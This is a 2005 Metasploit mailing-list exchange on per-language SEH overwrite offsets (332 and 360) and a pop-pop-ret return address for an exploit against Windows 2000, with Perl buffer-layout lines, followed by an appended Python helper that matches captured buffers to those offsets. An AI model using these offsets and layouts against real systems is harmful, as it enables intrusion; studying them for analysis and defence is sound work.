Metasploit mailing list archives: different offset for different languages

From: jerome.athias at (Jerome Athias)
Date: Tue, 13 Dec 2005 16:37:53 +0100


you can try to use my little international opcodes database:

it is provided "as is" with no warranty (it's not a MSF team project)
if you can help with other platforms/languages => mail me ;-)


msf-list at wrote:

Hi, I'm playing with
with my win00 Italian version (SP0) and the exploit doesn't work;
after a little debug session I understood why.

For the Italian version the correct offset is 360, so I have added this:

      # Windows 2000 Italian SP0 SEH offset
      # overwritten handler address (little-endian), then the short jump four bytes before it
      substr($pattern, 360 + $hlen + 0, 4, pack('V', $target->[1]));
      substr($pattern, 360 + $hlen - 4, 2, "\xeb\x22");

For the English version (win00) the offset is:

      # Windows 2000 SEH offset goes first
      substr($pattern, 332 + $hlen + 0, 4, pack('V', $target->[1]));
      substr($pattern, 332 + $hlen - 4, 2, "\xeb\x22");

It's the same for the Win00 Advanced Server Italian version (SP4).

The only difference is the offset; the return address is always
0x004014e9 (pop pop ret).

Does someone know if it's the same for different languages?
For example, French, Spanish or German versions of win00?

Thank you for your attention, and sorry for my bad English :-(
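Added example, not code from the thread or from Metasploit: a small Python helper that records the per-language SEH offsets reported above and checks a captured buffer against each one, so an analyst can tell which Windows 2000 build a given payload was laid out for. The target names, the $hlen value and the filler bytes are constructed for illustration; the positions mirror the two substr() calls quoted in the post.

```python
import struct

# Per-build SEH offsets as reported in the thread (bytes from the start of the
# pattern, before the $hlen header). Target names are constructed labels.
SEH_OFFSETS = {
    "Windows 2000 English": 332,
    "Windows 2000 Italian SP0": 360,
    "Windows 2000 Advanced Server Italian SP4": 360,
}
POP_POP_RET = 0x004014E9      # the pop/pop/ret address the post says is shared by all builds
SHORT_JMP = b"\xeb\x22"       # the two-byte short jump written four bytes before the handler


def seh_layout_positions(offset, hlen):
    """Return (jump_pos, handler_pos) exactly as the Perl substr() calls compute them."""
    return offset + hlen - 4, offset + hlen


def identify_targets(pattern, hlen):
    """Names of the builds whose layout matches a captured buffer.

    A build matches when the little-endian handler address sits at offset+hlen and
    the short jump sits four bytes earlier; an unrelated buffer yields an empty list.
    """
    handler = struct.pack("<I", POP_POP_RET)   # same bytes as Perl pack('V', ...)
    matches = []
    for name, off in SEH_OFFSETS.items():
        jmp_pos, h_pos = seh_layout_positions(off, hlen)
        if (pattern[h_pos:h_pos + 4] == handler
                and pattern[jmp_pos:jmp_pos + 2] == SHORT_JMP):
            matches.append(name)
    return matches


def constructed_sample(offset, hlen, length=600):
    """Build a constructed filler buffer with the SEH layout at one offset (test data only)."""
    buf = bytearray(b"A" * length)
    jmp_pos, h_pos = seh_layout_positions(offset, hlen)
    buf[jmp_pos:jmp_pos + 2] = SHORT_JMP
    buf[h_pos:h_pos + 4] = struct.pack("<I", POP_POP_RET)
    return bytes(buf)


if __name__ == "__main__":
    # hlen=16 is an assumed header length for the demonstration
    for off in (332, 360):
        print(off, identify_targets(constructed_sample(off, 16), 16))
```

Because the Italian builds share offset 360, a buffer laid out for one of them matches both entries, which is exactly the ambiguity the post describes.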
